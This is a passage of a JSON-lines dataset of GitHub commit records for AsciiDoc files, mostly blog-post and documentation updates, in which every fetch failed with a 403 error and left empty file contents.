'https:\/\/github.com\/bluenergy\/bluenergy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5fa8d1c0cb9894f3ef3c3fc19c823e659328d0b","subject":"Update 2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","message":"Update 2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","new_file":"_posts\/2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab8396a9a5d0359a09179d8613d77550dd59e8eb","subject":"Added Camel 2.19.2 release notes to docs","message":"Added Camel 2.19.2 release notes to docs\n","repos":"tdiesler\/camel,sverkera\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,CodeSmell\/camel,christophd\/camel,anoordover\/camel,nicolaferraro\/camel,jamesnetherton\/camel,cunningt\/camel,objectiser\/camel,zregvart\/camel,adessaigne\/camel,davidkarlsen\/camel,sverkera\/camel,sverkera\/camel,onders86\/camel,tadayosi\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,davidkarlsen\/camel,jamesnetherton\/camel,cunningt\/camel,mcollovati\/camel,CodeSmell\/camel,DariusX\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,mcollovati\/camel,gnodet\/camel,kevinearls\/camel,zregvart\/camel,tdiesler\/camel,tadayosi\/camel,kevinearls\/camel,christophd\/camel,kevinearls\/camel,cunningt\/camel,pax95\/camel,nikhilvibhav\/camel,anoordover\/camel,onders86\/camel,onders86\/camel,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,tadayosi\/camel,kevinearls\/camel,sverkera\/camel,DariusX\/camel,apache\/camel,CodeSmell\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,objectiser\/camel,nikhilvibhav\/camel,ullgren\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,zregvart\/camel,apache\/camel,christophd\/camel,davidkarlsen\/camel,tdiesler\/camel,pax95\/camel,christophd\/camel,pax95\/camel,sverkera\/camel,Fabryprog\/camel,jamesnetherton\/camel,alvinkwekel\/camel,DariusX\/camel,tdiesler\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,anoordover\/camel,onders86\/camel,onders86\/camel,alvinkwekel\/camel,Fabryprog\/camel,Fabryprog\/camel,kevinearls\/camel,alvinkwekel\/camel,sverkera\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel,jamesnetherton\/camel,gnodet\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,anoordover\/camel,nicolaferraro\/camel,anoordover\/camel,objectiser\/camel,gnodet\/camel,kevinearls\/camel,punkhorn\/camel-upstream,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,anoordover\/camel,pax95\/camel,tdiesler\/camel,Fabryprog\/camel,pmoerenhout\/camel,mcollovati\/camel,apache\/camel,apache\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,jamesnetherton\/camel,DariusX\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,ullgren\/camel,gnodet\/camel,adessaigne\/camel,CodeSmell\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2192-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2192-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7e6f1d72a385934c0d2af0b9b0ed18519de8d40","subject":"minor formatting changes","message":"minor formatting changes\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49c3a5d2ad82dde18e6f31e94180e8bfbe17b3e9","subject":"Update 2017-04-15-Episode-95-King-of-Pin.adoc","message":"Update 2017-04-15-Episode-95-King-of-Pin.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-04-15-Episode-95-King-of-Pin.adoc","new_file":"_posts\/2017-04-15-Episode-95-King-of-Pin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff7549c77ddb4be14f2289647386ea6e500a7e8a","subject":"Publish 2006-08-01.adoc","message":"Publish 2006-08-01.adoc","repos":"realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io","old_file":"2006-08-01.adoc","new_file":"2006-08-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/realraindust\/realraindust.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ecf80f2075f98c5151f9579c3172ae79e324c5b","subject":"Create another_chapter.adoc","message":"Create another_chapter.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"another_chapter.adoc","new_file":"another_chapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"161f1b5504d66ea724f28a411bfad69072c3ad85","subject":"Update 2015-04-08-TO-DELETE.adoc","message":"Update 2015-04-08-TO-DELETE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-TO-DELETE.adoc","new_file":"_posts\/2015-04-08-TO-DELETE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b9a7c56369ee52b6af329cc7207843d72b0c528","subject":"Update 2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","message":"Update 2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","repos":"josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog","old_file":"_posts\/2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","new_file":"_posts\/2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josegomezr\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b05b5269925965cfeb785d5a54f9b2bee1d60e2","subject":"Update 2017-03-16-Web-Console-methods-and-styling-references.adoc","message":"Update 2017-03-16-Web-Console-methods-and-styling-references.adoc","repos":"metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog","old_file":"_posts\/2017-03-16-Web-Console-methods-and-styling-references.adoc","new_file":"_posts\/2017-03-16-Web-Console-methods-and-styling-references.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7161460cb27855579d19de111babb23b386b12c7","subject":"anotehr small update","message":"anotehr small update\n","repos":"wofanli\/trex-core,wofanli\/trex-core,wofanli\/trex-core,dimagol\/trex-core,wofanli\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,kisel\/trex-core,wofanli\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,kisel\/trex-core,dproc\/trex_odp_porting_integration,dproc\/trex_odp_porting_integration,kisel\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,wofanli\/trex-core,kisel\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"036aa947eee556c8f85de665ff85c90d7f468749","subject":"add asciidoc","message":"add asciidoc\n","repos":"bsorrentino\/forge-dynjs-addon,bsorrentino\/forge-js-addon,bsorrentino\/forge-js-addon,bsorrentino\/forge-dynjs-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsorrentino\/forge-dynjs-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63247a44d2c7b5068d1159a60d5175d3246427e7","subject":"Add a guide about the SSL support","message":"Add a guide about the SSL support\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/native-and-ssl-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/native-and-ssl-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70e0dc75e93da420801672878e3dd1888bc1160f","subject":"Creation of ImapMonitor documentation for Jira NMS-6656","message":"Creation of ImapMonitor documentation for Jira NMS-6656\n\nSigned-off-by: Ronny Trommer <36c2cbde021a457239efc9ba0c855feb82a5b5b7@opennms.org>\n","repos":"rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/ImapMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/ImapMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tdefilip\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b7a73196101dbf94ea9992ef2b4f548b84ec43bf","subject":"describe a team","message":"describe a team\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da9c673230cb5be3819e1e6ccf66056ea71c6213","subject":"y2b create post CALL ME NOW 647-403-3436","message":"y2b create post CALL ME NOW 647-403-3436","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-03-CALL-ME-NOW-6474033436.adoc","new_file":"_posts\/2016-09-03-CALL-ME-NOW-6474033436.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fee2701eda70bfd355d086b70904f284807159e1","subject":"Update 2016-11-05-About-The-Dullest-Saga.adoc","message":"Update 2016-11-05-About-The-Dullest-Saga.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9102742c872e1d3f43baa52b19294d5d715e5e0b","subject":"Update 2016-11-08-181300-Tuesday-Workday.adoc","message":"Update 2016-11-08-181300-Tuesday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75211c236364f8a5243c2c50d7f4bd1ee7a36557","subject":"Update 2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","message":"Update 2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","repos":"wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io","old_file":"_posts\/2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","new_file":"_posts\/2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wesamhaboush\/wesamhaboush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"193fa3bfc15e848a393ebe297eae351137a460fb","subject":"Adding log4j note","message":"Adding log4j note\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-14-note-on-log4j-security.adoc","new_file":"_posts\/2021-12-14-note-on-log4j-security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3fa03199dbd2238d35a16a2c612f9cb1b64d09f","subject":"y2b create post $300 Fan Shopping Challenge With Android Pay","message":"y2b create post $300 Fan Shopping Challenge With Android Pay","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-30-300-Fan-Shopping-Challenge-With-Android-Pay.adoc","new_file":"_posts\/2016-10-30-300-Fan-Shopping-Challenge-With-Android-Pay.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c65f56dac8c4672d774bc57bc57975214339bc9","subject":"Update 2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","message":"Update 2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","new_file":"_posts\/2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e243f9a2b2455aa8384572df28c1f72c1fb8b476","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87492a2627bc1ea331a608d43585a61427c5c27a","subject":"Update 2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","message":"Update 2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","repos":"tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io","old_file":"_posts\/2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","new_file":"_posts\/2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/tedbergeron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664f37555e8496d5f539d0b60a6f58392fe258c2","subject":"add test doc with complex purpose section.","message":"add test doc with complex purpose section.\n\nThis commit message is also on multiple rows\nand uses *_asciidoc_* notation as a test.\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"data\/testdocs\/wellformed\/adorned_purpose.adoc","new_file":"data\/testdocs\/wellformed\/adorned_purpose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ba38ac9e9640527f83c4b328645bbbeb76c56e9","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebea0c86a595d609e83a9539273ebb4d107faed2","subject":"y2b create post Don't Miss These Prime Day Tech Deals!","message":"y2b create post Don't Miss These Prime Day Tech Deals!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-10-Dont-Miss-These-Prime-Day-Tech-Deals.adoc","new_file":"_posts\/2017-07-10-Dont-Miss-These-Prime-Day-Tech-Deals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"029451119b34d155e61c1d780110950ec84a8eba","subject":"Renamed '_posts\/2017-05-16-Faster-IDE.adoc' to '_posts\/2017-05-16-IDE-Faster-IDE.adoc'","message":"Renamed '_posts\/2017-05-16-Faster-IDE.adoc' to '_posts\/2017-05-16-IDE-Faster-IDE.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-IDE-Faster-IDE.adoc","new_file":"_posts\/2017-05-16-IDE-Faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"770ce79ee6bec93d5a89f375283000d6938e0156","subject":"#169: added README for cli","message":"#169: added README for cli\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"cli\/README.adoc","new_file":"cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6164a36b957e38f712b0a2a5cbdd25e74b7a8c10","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c68ff180ce22139b7ad0c284807b41f24f9470f","subject":"Create intellij.adoc","message":"Create intellij.adoc","repos":"swehacker\/cheatsheets,swehacker\/cheatsheets","old_file":"drafts\/intellij.adoc","new_file":"drafts\/intellij.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/swehacker\/cheatsheets.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b49a9b0142dd149c1ebbcd1d96d84573f833bf2d","subject":"Deleted 2016-6-25-Git-one.adoc","message":"Deleted 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a7ef9bb3883fd6dc74cc34a218ec3c3f66c5dba","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-commons","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-commons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83e03bdfdfd28665af41febe00f31fdc631f5f2a","subject":"Update 2015-08-05-staratup.adoc","message":"Update 2015-08-05-staratup.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-08-05-staratup.adoc","new_file":"_posts\/2015-08-05-staratup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74e8b08090b91fd1748eefd31fb0025a061d5e27","subject":"Update 2017-03-02-A-F-Poem.adoc","message":"Update 2017-03-02-A-F-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-02-A-F-Poem.adoc","new_file":"_posts\/2017-03-02-A-F-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b46b4aa4c500af3541ff21375429104097829fd","subject":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","message":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d11bc4a339d509a6b33e31bf98b8c5bf5c7e12c","subject":"Update 2015-05-16-Faustino-loeza-Perez8.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez8.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez8.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7941f8fc804e8e03233559b77ea5ddff374253ff","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d45a8bb054beac7aab867dddb31bbdfef74b0c7","subject":"Update 2017-03-15-Hadoop-etat-des-lieux.adoc","message":"Update 2017-03-15-Hadoop-etat-des-lieux.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-03-15-Hadoop-etat-des-lieux.adoc","new_file":"_posts\/2017-03-15-Hadoop-etat-des-lieux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b31c8b9da4513b5003bc14124b9b252ad94f677","subject":"Update 2016-01-11-We-can-be-heroes.adoc","message":"Update 2016-01-11-We-can-be-heroes.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-01-11-We-can-be-heroes.adoc","new_file":"_posts\/2016-01-11-We-can-be-heroes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a973c8d8e7d3cf6c2a0b8a866a18a12bbf102760","subject":"Update 2016-01-30-My-English-Title.adoc","message":"Update 2016-01-30-My-English-Title.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-01-30-My-English-Title.adoc","new_file":"_posts\/2016-01-30-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca99312e63c82c958f1108ca2d27cac6588de28f","subject":"Update 2017-01-28-Livros-de-Prolog.adoc","message":"Update 2017-01-28-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee8596acca86768bf3cc4bb3b74ad78256aa82b4","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 